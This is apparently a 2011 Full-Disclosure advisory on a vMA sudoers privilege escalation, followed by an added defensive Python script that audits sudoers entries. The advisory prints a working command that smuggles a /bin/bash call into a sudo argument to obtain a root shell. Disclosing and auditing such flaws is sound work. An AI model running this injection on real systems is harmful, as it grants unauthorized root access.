=======================================================================
VMware vSphere Management Assistant (vMA) - Local Privilege Escalation
=======================================================================

Affected Software : VMware vSphere Management Assistant (vMA)
Severity          : Medium
Local/Remote      : Local
Author            : @drk1wi

[Summary]

Due to an error in the /etc/sudoers file, it is possible to run arbitrary
shell commands within the context of the root user.

[Vulnerability Details]

[vi-admin@vMA ~]$ sudo /usr/bin/vmatargetcon --shell=/bin/bash "'raz';/bin/bash;"
35|ERROR|1|Unable to resolve hostname.
[root@vMA vi-admin]#

[Time-line]

27/04/2010 - Vendor notified
28/04/2010 - Vendor response
??? - Vendor patch release
16/05/2011 - Public disclosure

[Fix Information]

Edit the /etc/sudoers file.

Cheers,
@drk1wi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
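
An added example, not part of the original advisory and not VMware's code: a simplified audit that flags sudoers command grants with unrestricted or wildcard arguments, the kind of entry to look for when editing /etc/sudoers as the Fix Information section advises. The sample entries are constructed (the advisory does not show vMA's sudoers file, so the form of its entry is an assumption) and `audit_sudoers` is a hypothetical helper.

```python
import re
import shlex

# Constructed sample entries; the advisory does not show vMA's real sudoers file.
SAMPLE_SUDOERS = """\
# constructed example
Defaults env_reset
vi-admin ALL=(root) NOPASSWD: /usr/bin/vmatargetcon
vi-admin ALL=(root) /sbin/shutdown "", /sbin/service ntpd restart
vi-admin ALL=(root) /bin/cat /var/log/*
%wheel ALL=(ALL) ALL
"""

SKIP = re.compile(r"^\s*(#|$|Defaults|\w+_Alias\b)")  # comments, blanks, settings
RUNAS = re.compile(r"^\([^)]*\)\s*")                   # (root), (ALL:ALL)
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")                # NOPASSWD:, SETENV:, ...


def audit_sudoers(text):
    """Return (line number, user, command, finding) for loose command specs."""
    # Simplified: no line continuations, alias expansion or escaped commas.
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if SKIP.match(line) or "=" not in line:
            continue
        who, spec = line.split("=", 1)
        user = who.split()[0]
        for cmd in spec.split(","):
            cmd = TAGS.sub("", RUNAS.sub("", cmd.strip()))
            parts = shlex.split(cmd)
            if not parts:
                continue
            if parts[0] == "ALL":
                finding = "any command"
            elif len(parts) == 1:
                # sudoers: a bare path matches every argument list
                finding = "any arguments"
            elif any(ch in arg for arg in parts[1:] for ch in "*?["):
                finding = "wildcard arguments"
            else:
                continue  # fixed arguments, or "" meaning no arguments allowed
            findings.append((lineno, user, parts[0], finding))
    return findings


if __name__ == "__main__":
    for item in audit_sudoers(SAMPLE_SUDOERS):
        print("line %d: %s -> %s (%s)" % item)
```

Restricting the argument list in sudoers narrows what a user can pass, but a program that hands its arguments to a shell still needs its own input validation.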